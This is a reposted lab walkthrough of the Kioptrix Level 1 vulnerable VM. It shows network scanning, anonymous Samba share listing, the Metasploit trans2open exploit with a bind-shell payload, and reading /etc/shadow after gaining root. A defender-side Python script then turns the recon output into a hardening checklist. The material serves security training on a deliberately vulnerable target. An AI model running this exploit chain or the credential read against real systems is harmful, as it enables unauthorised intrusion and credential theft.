Sunday, September 11, 2011

HOWTO : Kioptrix - Level 1

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

The original post is here

Links

Watch video on-line
Download video

Brief Overview

Kioptrix is another "Vulnerable-By-Design OS" (like De-ICE, Metasploitable and pWnOS), with the aim of going from "boot" to "root" by any means possible. This is the second video on it; the first one is here. Unlike last time, the entry point was a Samba weakness, which makes for a quick attack straight to root.

Method

Scan network for hosts (nmap)
Scan target for running services (nmap)
Detect network shares (smbclient)
Exploit samba weakness, Trans2open (Metasploit)
Game Over

What do I need?

Kioptrix - Level 1 VM. Download here (Mirror: Part 1 MD5: 4F08E9FD3C4C1A4D85D0E9E79FC3A44D, Part 2 MD5: 8DB6CE65652880327B92150B08106EA)
VMware player OR workstation. Download here
nmap – (Can be found on BackTrack 4-R2). Download here
smbclient – (Can be found on BackTrack 4-R2). Download here
metasploit – (Can be found on BackTrack 4-R2). Download here

Walkthrough

A quick general nmap scan shows which hosts are currently on the network, before a more detailed scan is run against the target (192.168.0.111). This second scan reports the services (ports) the target has running and their versions, and then attempts to identify the operating system (OS). The results are:

* OS: Linux v2.4.x (2.4.9-18)
* Samba: Samba smbd (workgroup: MYGROUP)

The next stage was to check that Samba was actually functioning. Using smbclient, the attacker lists all services (shares) available on the target. The results are:

* Anonymous login
* Hostname (KIOPTRIX)
* Workgroup (MYGROUP)
* Default hidden admin shares (IPC$, ADMIN$)

The attacker then starts up Metasploit and searches for a known exploit. After configuring the required settings, the attacker launches it. Very soon afterwards the attacker has a remote shell with "root" access to the system.

Commands

start-network
dhclient eth0
clear

nmap 192.168.0.* -n -sn -sP
nmap 192.168.0.111 -T4 -O -sV -sS #-sC -A -p- -v

#nmblookup -A 192.168.0.111 # Hostname
smbclient -L \\192.168.0.111 -N # What services are available on a server
clear

msfconsole
search samba
use linux/samba/trans2open
#info
show options
set RHOST 192.168.0.111
show options
exploit
#msfcli linux/samba/trans2open RHOST=192.168.0.111 PAYLOAD=generic/shell_bind_tcp E #PAYLOAD=linux/x86/shell_bind_tcp

id
uname -a
cat /etc/shadow
cat /etc/issue
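
As an added, defender-side example (not part of g0tmi1k's post or the Kioptrix VM): a Python script that parses the two recon outputs the walkthrough relies on, `nmap -oG` (grepable) and `smbclient -L -N`, and turns them into a hardening checklist for your own hosts. The sample outputs are constructed to match the results listed above, and the `restrict anonymous` smb.conf setting it names is a Samba option, not something the post discusses.

```python
import re

# Constructed stand-ins for the walkthrough's two recon outputs (nmap -oG and
# smbclient -L -N); not captured from the original post, values illustrative.
SAMPLE_GNMAP = (
    "Host: 192.168.0.111 ()\tPorts: 22/open/tcp//ssh///, "
    "139/open/tcp//netbios-ssn//Samba smbd (workgroup: MYGROUP)/\tOS: Linux 2.4.9 - 2.4.18\n"
)
SAMPLE_SMBCLIENT = (
    "Anonymous login successful\n"
    "Domain=[MYGROUP] OS=[Unix] Server=[Samba]\n"
    "\tSharename      Type      Comment\n"
    "\t---------      ----      -------\n"
    "\tIPC$           IPC       IPC Service\n"
    "\tADMIN$         Disk      IPC Service\n"
)

def parse_gnmap(text):
    """Map each host in `nmap -oG` output to its open (port, proto, service, version)."""
    hosts = {}
    for line in text.splitlines():
        m = re.match(r"Host: (\S+).*\tPorts: ([^\t]*)", line)
        if not m:
            continue
        for item in m.group(2).split(", "):
            f = item.split("/")  # port/state/proto/owner/service/rpc/version/
            if f[1] == "open":
                hosts.setdefault(m.group(1), []).append((int(f[0]), f[2], f[4], f[6]))
    return hosts

def parse_smbclient(text):
    """Return (anonymous_ok, workgroup, share names) from `smbclient -L -N` output."""
    m = re.search(r"Domain=\[([^\]]*)\]", text)
    shares = re.findall(r"^\t(\S+)\s+(?:Disk|IPC|Printer)\s", text, re.M)
    return "Anonymous login successful" in text, (m.group(1) if m else ""), shares

def smb_findings(gnmap_text, smbclient_text):
    """Defender checklist: flag the exposures the walkthrough relied on."""
    findings = []
    for ip, ports in parse_gnmap(gnmap_text).items():
        for port, proto, _svc, version in ports:
            if port in (139, 445) and "samba" in version.lower():
                findings.append(f"{ip}: Samba on {proto}/{port} ({version}); firewall SMB, patch Samba")
    anonymous_ok, workgroup, shares = parse_smbclient(smbclient_text)
    if anonymous_ok:
        findings.append(f"null session allowed (workgroup {workgroup}); set 'restrict anonymous = 2'")
    findings += [f"admin share {s} listable anonymously" for s in shares if s.endswith("$")]
    return findings
```

Run it against real output with `nmap -oG - ...` and `smbclient -L <host> -N` redirected to files; a host that produces no findings has neither the exposed Samba service nor the null-session listing seen in the walkthrough.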


That's all! See you.